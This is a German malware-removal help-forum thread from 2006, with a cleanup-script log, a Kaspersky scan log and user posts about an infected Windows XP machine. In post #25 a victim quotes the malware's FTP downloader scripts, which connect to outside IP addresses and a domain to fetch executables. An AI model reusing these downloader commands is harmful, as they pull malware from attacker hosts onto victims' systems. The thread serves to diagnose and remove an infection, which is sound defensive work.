
Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MSDISK deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDisk deleted successfully.


Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MSDISK not found!
Deletion of registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MSDISK failed!

Could not process line:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_MSDISK
Status: 0xc0000034



Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSDisk not found!
Deletion of registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSDisk failed!

Could not process line:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSDisk
Status: 0xc0000034

Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\Root\LEGACY_MSDISK deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\MSDisk deleted successfully.


Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MSDISK not found!
Deletion of registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MSDISK failed!

Could not process line:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_MSDISK
Status: 0xc0000034



Registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDisk not found!
Deletion of registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDisk failed!

Could not process line:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDisk
Status: 0xc0000034



File C:\WINDOWS\system32\irdvxc.exe not found!
Deletion of file C:\WINDOWS\system32\irdvxc.exe failed!

Could not process line:
C:\WINDOWS\system32\irdvxc.exe
Status: 0xc0000034



File C:\WINDOWS\system32\.exe not found!
Deletion of file C:\WINDOWS\system32\.exe failed!

Could not process line:
C:\WINDOWS\system32\.exe
Status: 0xc0000034


Completed script processing.

*******************

Finished! Terminate.



Ein paar schlüssel liesen sich nicht mehr löschen liegt es daran das ich die "irdvxc.exe" etwa gekilllt habe ?




-------------------------------------------------------------------------------
PROTOKOLL FÜR KASPERSKY ONLINE SCANNER
Freitag, 10. November 2006 13:25:54
Betriebssystem: Microsoft Windows XP Professional, Service Pack 1 (Build 2600)
Version von Kaspersky Online Scanner: 5.0.83.0
Letztes Update der Antiviren-Datenbanken: 10/11/2006
Anzahl der Einträge in den Antiviren-Datenbanken: 226698
-------------------------------------------------------------------------------

Scan-Einstellungen:
Folgende Antiviren-Datenbanken zur Untersuchung verwenden: Standard
Archive untersuchen: ja
Mail-Datenbanken untersuchen: ja

Untersuchungsobjekt - Kritische Objekte:
C:\WINDOWS
C:\DOKUME~1\fOrm@t\LOKALE~1\Temp\

Untersuchungsergebnisse:
Untersuchte Objekte insgesamt: 18724
Viren gefunden: 1
Infizierte Objekte gefunden: 1 / 0
Verdächtige Objekte gefunden: 0
Untersuchungszeit: 00:09:57

Name des infizierten Objekts / Virusname / Letzte Aktion
C:\WINDOWS\Debug\PASSWD.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\SchedLgU.Txt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\Sti_Trace.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\ACEEvent.evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\Antivirus.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\AppEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\default Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\default.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SAM Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SAM.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SecEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SECURITY Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SECURITY.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\software Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\software.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\SysEvent.Evt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\system Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\config\system.LOG Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\h323log.txt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\i Infizierte Objekte: Trojan-Downloader.BAT.Ftp.ab übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Das Objekt ist gesperrt übersprungen
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Das Objekt ist gesperrt übersprungen
C:\WINDOWS\Temp\Perflib_Perfdata_6f0.dat Das Objekt ist gesperrt übersprungen
C:\WINDOWS\Temp\_avast4_\Webshlock.txt Das Objekt ist gesperrt übersprungen
C:\WINDOWS\wiadebug.log Das Objekt ist gesperrt übersprungen
C:\WINDOWS\wiaservc.log Das Objekt ist gesperrt übersprungen
C:\DOKUME~1\fOrm@t\LOKALE~1\Temp\ mon000.log Das Objekt ist gesperrt übersprungen

Die Untersuchung wurde abgeschlossen.

#24 smArtfOrmAt

es muesste wieder alles o.k. sein - gibt es noch probleme ???
__________
MfG Sabina

rund um die PC-Sicherheit

#25 ja die irdvxc.exe ist mir im sytemverzeichnis auch aufgefallen. angefangen hatte es aber mit einer a.exe-Datei

Aufmerksam wurde ich zunächst dass die DrWatson bei der services.exe ein Problem meldete. Desweiteren konnte ich ich im Taskmanager beobachten dass cmd.exe vom SYSTEM gestartet wurde und wenn dann noch ftp.exe sich hinzugesellte war das der moment wo ich dem Rooter den Strom kappte, nach dem sich die Programme nicht anders beenden ließen.

folgende verdächtige Dateien installierten sich nach und nach im System32-verzeichnis:

ntfs.ch
a.exe
i
irdvxc.exe
.exe
p.exe

Die Antiviren und Adware-programme schienen mir zu versagen, so half ich mir wie folgt selbst und konnte bislang auch noch keinen größeren Schaden beobachten:

habe eigene Dateien mit den oben aufgeführten Namen angelegt und die Rechte auf kein Zugriff gesetzt, desweiteren die Rechte fürs SYSTEM für die cmd.exe und ftp.exe auf kein Zugriff gesetzt, jetzt wart ich ab was sonst noch kommt.

Hier mal zur erbauung der Quelltext von ntfs.ch:
open 84.162.112.182 20029
user blah blah
pass blah
get ntfsloc.exe
quit

und i:
open 203.64.234.20 2755
user 1 1
get p.exe
quit

nochmal für ne neue i:
open ftp.tgono.com 2755
user 1 1
get p.exe
quit

das deutet wohl darauf hin dass sich da was aus dem Internet herunterladen möchte ... als bestimmt ein dicker Wurm womöglich mit Backdoor-Option

#26 Chamelot

poste dieses log
http://virus-protect.org/artikel/tools/combofix.html

stelle den CleanUp genauso ein, wie hier angegeben:
http://virus-protect.org/cleanup.html

Kopiere diese 6 Textdateien ab . (rechtsklick mit der Maus -> den Text markieren -> kopieren -> einfügen) Sie sind nach Datum geordnet. (kopiere nur die letzten 3 Monate ab)
http://virus-protect.org/datfindbat.html
__________
MfG Sabina

rund um die PC-Sicherheit

#27 Ja ist bis auf´s erste alles O.K.
Hab die restlichen EXEn gelöscht und mir nen 2tes virus Prog. besorgt !

Kannst du mir tip geben was die beste Antivirus&firewall- software derzeit ist ?
Oder welche du benutzt ?


Danke super support

#28 smArtfOrmAt

wenn du das laedst, muessen vorher alle anderen Virenproggies entfernt werden

Kaspersky Anti-Virus 6.0
http://virus-protect.org/antivirenfree.html

andere Scanner
http://virus-protect.org/antivirshare.html
__________
MfG Sabina

rund um die PC-Sicherheit

#29 Danke, jedoch ...

combofix sagt : unsupported operating system -> wäre hier ne NT4 TSE

cleanup.exe sagt: Der Prozedureinstiegspunkt "CreateToolhelp32Snapshot" konnte in der Dynamic Link Library "KERNEL32".dll" nicht gefunden werden.

werd wohl heut leider nicht mehr dazu kommen, den Dingen auf den Grund zu gehen

Gruss Chamelot!

#30

Zitat

desweiteren die Rechte fürs SYSTEM für die cmd.exe und ftp.exe auf kein Zugriff gesetzt,

du hast die Eingabeaufforderung deaktiviert - so komme ich nicht an die Daten
__________
MfG Sabina

rund um die PC-Sicherheit